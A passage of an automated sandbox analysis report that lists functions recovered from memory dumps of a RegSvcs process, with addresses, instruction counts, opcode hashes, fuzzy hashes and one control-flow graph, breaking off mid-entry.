                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F7E1F2), ref: 05F7E2DF
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: fed988ff5571707bc9b526125fc6442020a611be3168e941e364c1f183fcf155
                                                • Instruction ID: 68b90262800d7c18dedf7477670c1cc1d205d34b3a317076d9ef189b161f9ba5
                                                • Opcode Fuzzy Hash: fed988ff5571707bc9b526125fc6442020a611be3168e941e364c1f183fcf155
                                                • Instruction Fuzzy Hash: 7A1106B1C006599BDB10CF9AC4457DEFBF4EB48210F14816AD818A7240D778A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A3E74 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1978 10a3e74-10a3ee6 1980 10a3ee8-10a3ef3 1978->1980 1981 10a3f30-10a3f32 1978->1981 1980->1981 1983 10a3ef5-10a3f01 1980->1983 1982 10a3f34-10a3f8c 1981->1982 1992 10a3f8e-10a3f99 1982->1992 1993 10a3fd6-10a3fd8 1982->1993 1984 10a3f03-10a3f0d 1983->1984 1985 10a3f24-10a3f2e 1983->1985 1987 10a3f0f 1984->1987 1988 10a3f11-10a3f20 1984->1988 1985->1982 1987->1988 1988->1988 1989 10a3f22 1988->1989 1989->1985 1992->1993 1995 10a3f9b-10a3fa7 1992->1995 1994 10a3fda-10a3ff2 1993->1994 2001 10a403c-10a403e 1994->2001 2002 10a3ff4-10a3fff 1994->2002 1996 10a3fca-10a3fd4 1995->1996 1997 10a3fa9-10a3fb3 1995->1997 1996->1994 1999 10a3fb7-10a3fc6 1997->1999 2000 10a3fb5 1997->2000 1999->1999 2003 10a3fc8 1999->2003 2000->1999 2005 10a4040-10a4052 2001->2005 2002->2001 2004 10a4001-10a400d 2002->2004 2003->1996 2006 10a400f-10a4019 2004->2006 2007 10a4030-10a403a 2004->2007 2012 10a4059-10a408e 2005->2012 2008 10a401b 2006->2008 2009 10a401d-10a402c 2006->2009 2007->2005 2008->2009 2009->2009 2011 10a402e 2009->2011 2011->2007 2013 10a4094-10a40a2 2012->2013 2014 10a40ab-10a410b 2013->2014 2015 10a40a4-10a40aa 2013->2015 2022 10a411b-10a411f 2014->2022 2023 10a410d-10a4111 2014->2023 2015->2014 2025 10a412f-10a4133 2022->2025 2026 10a4121-10a4125 2022->2026 2023->2022 2024 10a4113 2023->2024 2024->2022 2028 10a4143-10a4147 2025->2028 2029 10a4135-10a4139 2025->2029 2026->2025 2027 10a4127-10a412a call 10a0ab8 2026->2027 2027->2025 2032 10a4149-10a414d 2028->2032 2033 10a4157-10a415b 2028->2033 2029->2028 2031 10a413b-10a413e call 10a0ab8 2029->2031 2031->2028 2032->2033 2037 10a414f-10a4152 call 10a0ab8 2032->2037 2034 10a416b-10a416f 2033->2034 2035 10a415d-10a4161 2033->2035 2039 10a417f 2034->2039 2040 10a4171-10a4175 2034->2040 2035->2034 2038 10a4163 2035->2038 2037->2033 2038->2034 2043 10a4180 2039->2043 2040->2039 2042 10a4177 2040->2042 2042->2039 2043->2043
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: ebcdc18f867a8a7a0a222953141d3f2d6fbc9f714174201fe5022e523721fa09
                                                • Instruction ID: 85d57a8338d43097c8fc56a73e964a990754e55b8a9d7af192b24094eb3f7ce1
                                                • Opcode Fuzzy Hash: ebcdc18f867a8a7a0a222953141d3f2d6fbc9f714174201fe5022e523721fa09
                                                • Instruction Fuzzy Hash: 53916970E002498FDF60CFA8C8817DEBBF1BF48314F588129E494EB254EB749886CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1488 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D
                                                • API String ID: 0-2746444292
                                                • Opcode ID: 6dc9c9ad5f9df164753817bd1047f105a6764bfa5bcdea5811ecef324ae2c020
                                                • Instruction ID: 876f83df6e59101b0961c5d23c8c6e6bebd564147fa51fa09e4deb8b51ccefba
                                                • Opcode Fuzzy Hash: 6dc9c9ad5f9df164753817bd1047f105a6764bfa5bcdea5811ecef324ae2c020
                                                • Instruction Fuzzy Hash: 2911C231F002159FDF51EFFC84842EE7BE5EB48214F9404BAD985EB202EB35C8428B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A7908 Relevance: .6, Instructions: 554COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9cd8fb1d0245d08a338421bb887af1ba064ff67e94ab7dc1e32a169a6d9521c0
                                                • Instruction ID: 69ab0ed1724427644e35af2363aebdf4fa993ae86e2f5b1b3a7a3b8b7bb0993a
                                                • Opcode Fuzzy Hash: 9cd8fb1d0245d08a338421bb887af1ba064ff67e94ab7dc1e32a169a6d9521c0
                                                • Instruction Fuzzy Hash: BB12AF307106058FDB2AAF3CE88572C76A6EBC9350B508A29E446CB756DF76DC42CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A7918 Relevance: .6, Instructions: 550COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0d05d540fa5c6e3ab9110b5a18859f79ce4c80090eecc05dfc907d0133ca628
                                                • Instruction ID: 23e4a4b24d3daeb6b63d0fa5420430d7fa5a21aea8100622fe2d359ecb3d315c
                                                • Opcode Fuzzy Hash: e0d05d540fa5c6e3ab9110b5a18859f79ce4c80090eecc05dfc907d0133ca628
                                                • Instruction Fuzzy Hash: 6712A0307106058BDB2AAF3CE88572C76A6EBC9350B508A2DE446CB746DF76DC42CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A4A8D Relevance: .3, Instructions: 263COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1d17d299eb6075d93764dad72e373dd5fc9b4f05e3ca69bf9adcb20211ffcfa
                                                • Instruction ID: 885661faed363ef0af9e72b86a68ac7391a764263cb8bcf79d88d7a8f5bc6803
                                                • Opcode Fuzzy Hash: c1d17d299eb6075d93764dad72e373dd5fc9b4f05e3ca69bf9adcb20211ffcfa
                                                • Instruction Fuzzy Hash: D7B15B74E102598FDB50DFE8D8817DDBBF1BF48314F588129D898EB254EBB49886CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9364 Relevance: .2, Instructions: 239COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbe116fd00b62ec5f2dd48825aa93435db76b7e667daae66f4d4b8d0305c3092
                                                • Instruction ID: af9d26643045ce087edf2db1df38f012dac84129c042a604a2bfe77f4511b830
                                                • Opcode Fuzzy Hash: dbe116fd00b62ec5f2dd48825aa93435db76b7e667daae66f4d4b8d0305c3092
                                                • Instruction Fuzzy Hash: 83918D34B002148FDB15DFA8D594AADBBF2EF88314F648465E446E73A5DB31DC42CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A6EDA Relevance: .2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4998e5346e5e6765f94926242e3f2ae1024e401c2139977b7b72982f8ee1aa2a
                                                • Instruction ID: c860f8ce83223d3df8260fa2ab4919e3cabd1a4d4787d38903e11be0dc0ace6f
                                                • Opcode Fuzzy Hash: 4998e5346e5e6765f94926242e3f2ae1024e401c2139977b7b72982f8ee1aa2a
                                                • Instruction Fuzzy Hash: 6F51B230E002149FDB15DBBCC4557AEBBB2FF85300F50856AE446EB281DB729842CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A6CE2 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4ce52346f539a82235da26dc4e994454b52435c6bec1016fb20361f59be39d2
                                                • Instruction ID: 4337e99e8e0bc573155ac6c73f1088d35ebeb93015b681348e1d9d821c9d4ac9
                                                • Opcode Fuzzy Hash: c4ce52346f539a82235da26dc4e994454b52435c6bec1016fb20361f59be39d2
                                                • Instruction Fuzzy Hash: 02511371D002188FDB24CFA9C885BDDBBF1BF48300F588119E855BB351D775A885CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A6CE8 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 612b1a152301fa027f9d1e06aec5eb57e7ee78a38344b60ce36e246017250724
                                                • Instruction ID: d98be6de849a965f2f41e5b3e6aad044b5d0192613192e0fdbc61ab7b23f7233
                                                • Opcode Fuzzy Hash: 612b1a152301fa027f9d1e06aec5eb57e7ee78a38344b60ce36e246017250724
                                                • Instruction Fuzzy Hash: 1A511271D002188FDB18DFA9C888B9DFBF1BF48310F588129E855BB391D779A884CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1128 Relevance: .1, Instructions: 120COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca790aed83f3fb3b8bfcc45e086e7651c72b73e2720bbb4bf55f0d717f307844
                                                • Instruction ID: 3a1f780446d3d90cdf6409585541340f8c40d33c71b4c2b3b3f28c5db3647868
                                                • Opcode Fuzzy Hash: ca790aed83f3fb3b8bfcc45e086e7651c72b73e2720bbb4bf55f0d717f307844
                                                • Instruction Fuzzy Hash: A3511C341133418FDB0AFF28F891B493B72F7553493008969D0439B67ADA7169A7CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1138 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70c3a689909d932510423e90c98a98af1b8758909c1c48f50f697e24350f2dda
                                                • Instruction ID: 99d7ee6174e7b21d6869a7f55ed423b143f690081c493831a84431c7a18b32fe
                                                • Opcode Fuzzy Hash: 70c3a689909d932510423e90c98a98af1b8758909c1c48f50f697e24350f2dda
                                                • Instruction Fuzzy Hash: 915109341133418FDB0AFF28F891B493B76F7953493008968D0439B67ADA6169A7CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010AF4C5 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: decaf870f91149527db27f47eee2cf7b23a0c9ec6a9f5333a454005d8526d113
                                                • Instruction ID: 9b2903ffb2f9ed4da20c607ae3010ad33058d6a7d8c16e4fa728204a263f09e1
                                                • Opcode Fuzzy Hash: decaf870f91149527db27f47eee2cf7b23a0c9ec6a9f5333a454005d8526d113
                                                • Instruction Fuzzy Hash: DF3107307002029FEB19AF78D45466E7BE2EF89250F64456DD086DB396DF39CC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010AF4D8 Relevance: .1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10d4d6e474d10383a39db239dae4570a4d3eefb190f016ac9e406b17e0fb4a52
                                                • Instruction ID: 9cde12b6b93a2deb2979accf68de40c96a1bc41dde0d4b9d22b73c7dce9557c3
                                                • Opcode Fuzzy Hash: 10d4d6e474d10383a39db239dae4570a4d3eefb190f016ac9e406b17e0fb4a52
                                                • Instruction Fuzzy Hash: CE31F030B002028FEB6AAF78D55466E3BE3AF89240F60456CD086DB395EF35CD41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A96E0 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f51f260e630ab4ab189f55bd307715fa186e1d82304b3aded5e9e802d7bec815
                                                • Instruction ID: b37bb76e0f2c751887d68d9373477307dee388cbbbaf07f348b2c6ba75da520b
                                                • Opcode Fuzzy Hash: f51f260e630ab4ab189f55bd307715fa186e1d82304b3aded5e9e802d7bec815
                                                • Instruction Fuzzy Hash: 8131DD34B002098FDFA59EECD98076FBBA6FB85314F600869C54ADB380DA34DC418BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010AF388 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3577fb8f8d76326a926f1aecfcf770f3c6dba4c82f48176d846dc4c61a4e2c5
                                                • Instruction ID: 7e992c578575890e4d47959ba262d1409e49a366d4cfa93372ba50d1ca0c8b0b
                                                • Opcode Fuzzy Hash: a3577fb8f8d76326a926f1aecfcf770f3c6dba4c82f48176d846dc4c61a4e2c5
                                                • Instruction Fuzzy Hash: B1315E35A106169BDB15CFA8D49469EBBB2EF88300F508929E846EB751DF74E842CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A26DC Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 42338e6358c9f95399ce53eb4080304dc65427c2e6de34fcacd63363c45f01a0
                                                • Instruction ID: edf94b76703c7172a32a29c29062c8249f70e0cce9c31a1b9e8e52fe443e7f2a
                                                • Opcode Fuzzy Hash: 42338e6358c9f95399ce53eb4080304dc65427c2e6de34fcacd63363c45f01a0
                                                • Instruction Fuzzy Hash: A641CEB4D01348DFEB20CFA9C484ADEBBB5FF48310F64842AE419AB254DB759946CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A6F78 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 527882de0cc6d1e7801bbec94ef5fba0170352ad20280574f1ef637a69ddfede
                                                • Instruction ID: 03392e1084ec8eb1680283f7a6e02948eabdee02f5cea9a02312b7dbc6f9a050
                                                • Opcode Fuzzy Hash: 527882de0cc6d1e7801bbec94ef5fba0170352ad20280574f1ef637a69ddfede
                                                • Instruction Fuzzy Hash: DF317034E40209DBDB25CFA8D444B9EB7F5FF85310F90856AF445EB241EB72A942CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010AF398 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f076d29098c25b61f9dce39b70f12fb29fa3170634858b8becca190cb4a7a0a
                                                • Instruction ID: 92b50472f5a3d68880d231674211a6cf41f4303710fb2d4efd8f4f6155fd3f22
                                                • Opcode Fuzzy Hash: 5f076d29098c25b61f9dce39b70f12fb29fa3170634858b8becca190cb4a7a0a
                                                • Instruction Fuzzy Hash: DF314D35E1061A9BDB19CFA8D49469EBBF2FF89300F508929E846E7751DF70A842CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A26E8 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 602bc30d9645b866809ea2cc07049a352761033ec809327a0ed4812b5ba4b9cf
                                                • Instruction ID: eea8de013f78616517223086aff68ae9304cb34ed146ebdf7e00e8e1bac42134
                                                • Opcode Fuzzy Hash: 602bc30d9645b866809ea2cc07049a352761033ec809327a0ed4812b5ba4b9cf
                                                • Instruction Fuzzy Hash: 5241C070D01348DFDB24DF99C484ADEBBF5FF48310F548429E819AB254DB75A946CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9250 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d740dc3e0ede2a0518208d92ae18dadb11feae30d08254fafc002c0a269c5235
                                                • Instruction ID: 63ef0260cae92c3e9f6381737978d27109a83c434d4e65bac0cc2fc5d9ffe118
                                                • Opcode Fuzzy Hash: d740dc3e0ede2a0518208d92ae18dadb11feae30d08254fafc002c0a269c5235
                                                • Instruction Fuzzy Hash: 7331B135E102199BDB05CFE8C4907DEFBB2FF89304F50C659E445AB241EB719842CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9260 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57e8e5c30fd276776c28f189839ad4932c144060f00764db3458b973eff50cb7
                                                • Instruction ID: 898febd2b583b272efe3526a2fcb8000e717e91c423cac201b6c9f31ac2c5c6c
                                                • Opcode Fuzzy Hash: 57e8e5c30fd276776c28f189839ad4932c144060f00764db3458b973eff50cb7
                                                • Instruction Fuzzy Hash: 2B21B135F102199FDB15CFA8C49069EFBB2FF89304F90C619E845EB251EB709842CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A6BA0 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 499623b4aca6ee6c9275ef0f98a3fd7225037e2fa900db7bd00654067672c82c
                                                • Instruction ID: d13e1aa7d23c0dfada43c4e46385b58cfdb294ec0a51671686d2aee32c326516
                                                • Opcode Fuzzy Hash: 499623b4aca6ee6c9275ef0f98a3fd7225037e2fa900db7bd00654067672c82c
                                                • Instruction Fuzzy Hash: AB213831B042405FD706AB7D94612EE3FF6EF8A300B0485AAD046DB396DE358D07CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A16A0 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba7f33190db3001621711ed1da5c5482c359107ec393c30395ccc3b1d8f99092
                                                • Instruction ID: f2fb30462ab2ed7e0418cf86f15c382189f737f05abb19ed7e9badf198b07911
                                                • Opcode Fuzzy Hash: ba7f33190db3001621711ed1da5c5482c359107ec393c30395ccc3b1d8f99092
                                                • Instruction Fuzzy Hash: 0E21B6346151004FEF57EB78E884B6D37B5FB49344F408AA5D087CB296E774D8528F92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9150 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3a0ecb1db1345828a1298644d6b52455bf272aa07a4e736aa718b06ddbed535
                                                • Instruction ID: b8e37f434e3171baa4c1682157f321938a19f9ac85fe2f3505df4e4be1f080e4
                                                • Opcode Fuzzy Hash: f3a0ecb1db1345828a1298644d6b52455bf272aa07a4e736aa718b06ddbed535
                                                • Instruction Fuzzy Hash: 02219034F042198BDB19CFA8D8546DEF7B2EF89304F50861AE856FB351EB70A942CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1380 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25cca12a75e02f9101f13603d028834e30ba159b1b9e4f9adde15a3bc6e32510
                                                • Instruction ID: 594d7c54ad8f279098c9af7f1ab6b0aa0b0c2b48c68042443d4671e571feff9d
                                                • Opcode Fuzzy Hash: 25cca12a75e02f9101f13603d028834e30ba159b1b9e4f9adde15a3bc6e32510
                                                • Instruction Fuzzy Hash: B321D230A043109FEF776BBCE5993BC37A5EB06315F4048A9E587CB2C2DA7588818B42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A4F88 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54cee58ef0bc97037c2e4923f7b2fdd774c3cc195c56a8118c00030aaa433d32
                                                • Instruction ID: 7255927f7f29001c637441e20783bf2f06dc6cd706b771d91521fbb8b0a9a071
                                                • Opcode Fuzzy Hash: 54cee58ef0bc97037c2e4923f7b2fdd774c3cc195c56a8118c00030aaa433d32
                                                • Instruction Fuzzy Hash: 17212834740204CFDB54EBB8D958B9D77F1FB48604F1004A8E446EB3A9EB769D01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1878 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cdf40556f2f9a0f5f3df084fcd7eb58920a133f02057364dd00662777d69c9c2
                                                • Instruction ID: a1e78526646ea86b8c374cc131e16f3a5cc281b6120b797ec58b47937f137596
                                                • Opcode Fuzzy Hash: cdf40556f2f9a0f5f3df084fcd7eb58920a133f02057364dd00662777d69c9c2
                                                • Instruction Fuzzy Hash: 97216D34B40205CFEF54EBB8C5647AE77F6EF49241F6004A9D186EB2A4DB368D41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00D5D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2531405322.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_d5d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab1dc6f0c1ff70e8bc232f5fc0159fae274e6cecc98b394d5a1e0f90cba0250c
